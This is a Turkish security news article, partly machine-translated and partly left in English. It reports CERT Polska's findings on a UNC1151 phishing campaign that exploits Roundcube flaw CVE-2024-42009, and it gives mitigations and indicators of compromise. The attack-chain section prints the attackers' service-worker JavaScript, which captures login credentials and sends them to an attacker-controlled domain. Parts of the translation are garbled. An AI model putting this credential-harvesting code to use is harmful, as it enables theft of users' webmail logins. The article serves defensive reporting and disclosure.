Bilgisayar korsanları, XSS saldırısı yoluyla kullanıcı kimlik bilgilerini çalmak için roundcube güvenlik açığını kullanır

Polonya varlıklarını hedefleyen yakın tarihli bir spearfishing kampanyası, Belarus devlet çıkarlarına bağlı bir grup olan UNC1151 tehdit oyuncusu ve bazı kaynaklara göre Rus istihbarat hizmetlerine yüksek güvenle ilişkilendirildi.

CERT Polska, saldırganların, en az kullanıcı etkileşimi ile kullanıcı kimlik bilgilerini çalmak için Roundcube webmail platformunda (CVE-2024-42009) kritik bir güvenlik açığından yararlandığını bildiriyor.

Kimlik avı e -postaları, “[!IMPORTANT] Rezervasyon numarasına fatura: S2500650676 ”ve yalnızca alıcının istismarın tetiklenmesi için mesajı açması gerekir.

– Reklamcılık –

Güvenlik açığı, e -postaya gömülü kötü amaçlı JavaScript’in kurbanın tarayıcısında yürütülmesine izin vererek standart sanitizasyon mekanizmalarını atladı.

CVE-2024-42009 ve saldırı akışı

CVE-2024-42009, 1.5.7 ve 1.6.x’e kadar 1.6.7’ye kadar olan Roundcube sürümlerini etkileyen kritik bir siteler arası komut dosyası (XSS) güvenlik açığıdır.

Kusur, HTML özniteliklerinin uygunsuz işlenmesinin, saldırganların keyfi JavaScript kodunu enjekte etmesine ve yürütmesine izin veren Message_body () işlevindeki bir desanitizasyon hatasından kaynaklanır.

Sonar güvenlik araştırmacıları ilk olarak bu sorunu bildirdi ve yüksek riskini yansıtan CVSS V3.1 puanı 9.3.

Cert Polska tarafından gözlemlendiği gibi saldırı zinciri, iki temel aşamada ortaya çıktı:

1. İlk istismar ve servis çalışan kurulumu
   Kötü niyetli e -postayı açtıktan sonra, kurbanın tarayıcısı, bir kod snippet’i kullanarak bir hizmet çalışanını kaydettiren JavaScript’i yürüttü: XML This Service Worker, hosted as an attachment, enabled persistent background access to webmail sessions.
2. Credential Harvesting via Service Worker
The Service Worker intercepted login POST requests, capturing user credentials and exfiltrating them to an attacker-controlled domain: javascriptself.addEventListener('fetch', event => { if (event.request.method === 'POST') { const cloned = event.request.clone(); cloned.text().then(bodyText => { const params = new URLSearchParams(bodyText); const user = params.get('username') || params.get('_user'); const pass = params.get('password') || params.get('_pass'); fetch('https://a.mpk-krakow.pl/creds', { body: JSON.stringify({ login: user, password: pass }), // ... }); }); } }); Bu, kullanıcılar meşru webmail portallarına giriş yapmaya çalıştıkça saldırganların kimlik bilgileri toplamasına izin verdi.

CVE-2025-49113 ve savunma önlemleri

Yeni keşfedilen CVE-2025-49113’ten herhangi bir sömürü gözlemlenmemiş olsa da, bu güvenlik açığı, kimlik doğrulamalı saldırganların güvenli olmayan PHP nesnesi sazizleme yoluyla sunucuda keyfi kod yürütmesine izin vererek, tam webmail sunucusu devralma riski oluşturur.

Güvenlik uzmanları, bunu kimlik bilgisi hırsızlığı ile zincirlemenin yıkıcı saldırılar sağlayabileceği konusunda uyarıyor.

Öneriler:

• Her iki güvenlik açığını azaltmak için Roundcube’yi en az 1.6.11 veya 1.5.10 sürümüne güncelleyin.
• Bağlantılar için günlükleri inceleyin a.mpk-krakow[.]pl ve diğer uzlaşma göstergeleri.
• Tarayıcı Geliştirici Araçları aracılığıyla şifreleri sıfırlayın ve şüpheli hizmet çalışanlarını kaydettirin.
• Hedeflenirse olayları uygun CSIRT yetkilisine bildirin.

Uzlaşma Göstergeleri (IOC):

• Kötü niyetli gönderen adresleri: irina.vingriena@gmail[.]com– julitaszczepanska38@gmail[.]com
• Kimlik Bilgisi Hasat Alanı: a.mpk-krakow[.]pl
• Kötü niyetli JS’nin SHA256’sı: 70cea07c972a30597cda7a1d3cd4cd8f75acad75940ca311a5a2033e6a1dd149.

UNC1151 kampanyası, özellikle hükümet ve kurumsal ortamlarda yaygın olarak kullanılanlar olmak üzere webmail platformlarının zamanında yamalanması ve uyanık izlenmesinin kritik öneminin altını çizmektedir.

Siber güvenlik becerilerinizi yükseltmek için 150’den fazla pratik siber güvenlik kursuyla elmas üyeliği alın – buraya kaydolun